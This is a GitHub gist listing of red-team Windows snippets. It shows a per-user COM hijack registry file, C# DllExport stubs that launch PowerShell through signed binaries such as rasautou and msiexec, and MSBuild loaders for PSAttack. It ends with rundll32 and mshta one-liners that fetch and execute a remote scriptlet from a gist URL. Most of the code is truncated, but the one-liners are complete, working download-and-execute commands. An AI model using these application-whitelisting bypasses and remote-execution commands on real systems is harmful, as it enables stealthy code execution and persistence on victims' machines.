Navigation Menu

Skip to content

Instantly share code, notes, and snippets.

View NickTyrer's full-sized avatar

NickTyrer

37 followers · 0 following
View GitHub Profile
@NickTyrer
NickTyrer / com_hijack.reg
Last active October 27, 2020 06:15
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Classes\CLSID\{97d47d56-3777-49fb-8e8f-90d7e30e1a1e}]
[HKEY_CURRENT_USER\Software\Classes\CLSID\{97d47d56-3777-49fb-8e8f-90d7e30e1a1e}\InProcServer32]
@="C:\\Users\\Administrator\\Documents\\Visual Studio 2015\\Projects\\ClassLibrary2\\ClassLibrary2\\bin\\x86\\Debug\\ClassLibrary2.dll"
@NickTyrer
NickTyrer / coregen.cs
Last active May 12, 2021 08:13
using System;
using System.Runtime.InteropServices;
using RGiesecke.DllExport;
using System.Management.Automation;
using System.Collections.ObjectModel;
using System.Text;
namespace Export
{
class Test
@NickTyrer
NickTyrer / cpl.cs
Created October 11, 2016 13:18
using System;
using System.Runtime.InteropServices;
using RGiesecke.DllExport;
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.Text;
public class Test
{
@NickTyrer
NickTyrer / file.rsp
Created October 22, 2016 14:32
REGSVR odbcconf.dll
@NickTyrer
NickTyrer / msiexec.cs
Created November 8, 2016 20:31
// msiexec /z "full path to msiexec.dll"
using System;
using System.Runtime.InteropServices;
using RGiesecke.DllExport;
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.Text;
@NickTyrer
NickTyrer / PSA_MSBUILD64.csproj
Created November 18, 2016 17:51
PSAttack Using MSBuild Bytestream
This file has been truncated, but you can view the full file.
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- Based on Casey Smith work (https://gist.github.com/subTee/ca477b4d19c885bec05ce238cbad6371), -->
<!-- Based on Jared Haight work (https://github.com/jaredhaight/PSAttack), -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe PSA_MSBUILD64.csproj -->
<Target Name="PSAttack">
<PSA_MSBUILD64 />
</Target>
<UsingTask
TaskName="PSA_MSBUILD64"
TaskFactory="CodeTaskFactory"
@NickTyrer
NickTyrer / PSA64.cs
Created November 19, 2016 08:45
PSAttack Using MSBuild Downloader
This file has been truncated, but you can view the full file.
//Credits to Casey Smith for his initial research here "https://gist.github.com/subTee/ca477b4d19c885bec05ce238cbad6371"
//Based on Jared Haight work (https://github.com/jaredhaight/PSAttack)
//1. Compile "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:PSA64.exe PSA64.cs"
using System;
using System.Reflection;
namespace PSA64
{
class Program
{
@NickTyrer
NickTyrer / rasautou.cs
Created April 5, 2017 16:54
using System;
using System.Runtime.InteropServices;
using RGiesecke.DllExport;
using System.Management.Automation;
using System.Collections.ObjectModel;
using System.Text;
// compile using unmanaged exports and referencing system.management.automation
// rasautou -d powershell.dll -p powershell -a a -e e
@NickTyrer
NickTyrer / powersct.sct
Last active April 9, 2024 17:06
<?xml version="1.0" encoding="utf-8"?>
<package>
<component
id="dummy">
<registration
description="dummy"
progid="dummy"
version="1.00"
remotable="True">
<script
@NickTyrer
NickTyrer / instructions.txt
Last active May 1, 2023 13:12
xwizard_sct
xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC}
verclsid.exe /S /C {00000001-0000-0000-0000-0000FEEDACDC}
create new folder and rename file.{00000001-0000-0000-0000-0000FEEDACDC}
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";o=GetObject("script:https://gist.githubusercontent.com/NickTyrer/0598b60112eaafe6d07789f7964290d5/raw/7717cfad109fc15a6796dd9119b0267f7a4df3fd/power.sct");close();
mshta javascript:o=GetObject("script:https://gist.githubusercontent.com/NickTyrer/0598b60112eaafe6d07789f7964290d5/raw/7717cfad109fc15a6796dd9119b0267f7a4df3fd/power.sct");o.Exec();close();